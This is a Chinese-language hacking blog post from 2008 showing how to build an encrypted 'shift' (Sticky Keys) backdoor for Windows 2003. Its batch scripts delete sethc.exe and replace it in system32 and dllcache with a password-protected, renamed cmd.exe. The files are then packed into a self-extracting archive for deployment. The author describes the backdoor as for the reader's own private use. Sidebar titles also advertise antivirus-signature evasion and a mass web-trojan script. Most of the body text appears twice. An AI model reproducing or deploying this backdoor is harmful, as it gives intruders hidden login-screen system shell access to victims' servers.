上兴sp3版特征码修改完美过金山监控
VBS自动全盘批量挂马脚本
打造加密的windows2003 shift后门工具
15/06/2008 By 我本无邪, Via:本站原创
本博客原创奉献!!!!!!!!
所有的工具与代码我已经打包,文章末尾处可以下载。
1.建立first.bat,如下代码:
2.建立final.bat,如下代码:
注意%windir%\temp\codecmd.exe两句中的codecmd.exe是第3步骤我改的名字,具体而定。
3.从windows2003中提取cmd.exe,并对其重命名为非cmd.exe名称--------切记,否则影响后面的封装-------我命名为codecmd.exe。(对于windows2003的shift不能用xp的cmd.exe文件)
4.用黑洞作者陈经韬写的《exe文件加密器》将codecmd.exe添加启动密码。
5.利用winrar将codecmd.exe final.bat first.bat三文件制作成自解压包exe文件。如下图:
设置高级自解压选项。
路径%windir%\temp\
当然你也可以添加一个图标(我打包了一个图标)
下载文件
就这样制作成功了一个shift后门。
关于第3步为什么必须改名?
--------是因为执行bat的时候是执行cmd命令,解压包中的cmd.exe加密了,所以此时必须输入密码,从而打断了winrar的解压运行。因此必须改为其他名称,使其不执行包中的cmd.exe.为此我花了很久的时间弄清原因。
什么是shift后门?
------哼哼,百度一下吧
为什么要加密?
------哼哼,后门你一个人用噻
所有的工具与代码我已经打包,文章末尾处可以下载。
1.建立first.bat,如下代码:
@Echo off
@cd %windir%
@del /f /s /a sethc.exe
@cd %windir%
@del /f /s /a sethc.exe
2.建立final.bat,如下代码:
@Echo off
@copy %windir%\temp\codecmd.exe %windir%\system32\sethc.exe /y
@copy %windir%\temp\codecmd.exe %windir%\system32\dllcache\sethc.exe /y
@attrib +r +s sethc.exe
@copy %windir%\temp\codecmd.exe %windir%\system32\sethc.exe /y
@copy %windir%\temp\codecmd.exe %windir%\system32\dllcache\sethc.exe /y
@attrib +r +s sethc.exe
注意%windir%\temp\codecmd.exe两句中的codecmd.exe是第3步骤我改的名字,具体而定。
3.从windows2003中提取cmd.exe,并对其重命名为非cmd.exe名称--------切记,否则影响后面的封装-------我命名为codecmd.exe。(对于windows2003的shift不能用xp的cmd.exe文件)
4.用黑洞作者陈经韬写的《exe文件加密器》将codecmd.exe添加启动密码。
5.利用winrar将codecmd.exe final.bat first.bat三文件制作成自解压包exe文件。如下图:
设置高级自解压选项。
路径%windir%\temp\
当然你也可以添加一个图标(我打包了一个图标)
下载文件 就这样制作成功了一个shift后门。
关于第3步为什么必须改名?
--------是因为执行bat的时候是执行cmd命令,解压包中的cmd.exe加密了,所以此时必须输入密码,从而打断了winrar的解压运行。因此必须改为其他名称,使其不执行包中的cmd.exe.为此我花了很久的时间弄清原因。
什么是shift后门?
------哼哼,百度一下吧
为什么要加密?
------哼哼,后门你一个人用噻
作者:我本无邪@无邪世界
地址:http://www.noevil.com.cn/read.php/58.htm
版权所有©转载时必须以链接形式注明作者和原始出处及本声明!
Theme by k2 Modified by
考试考好了啊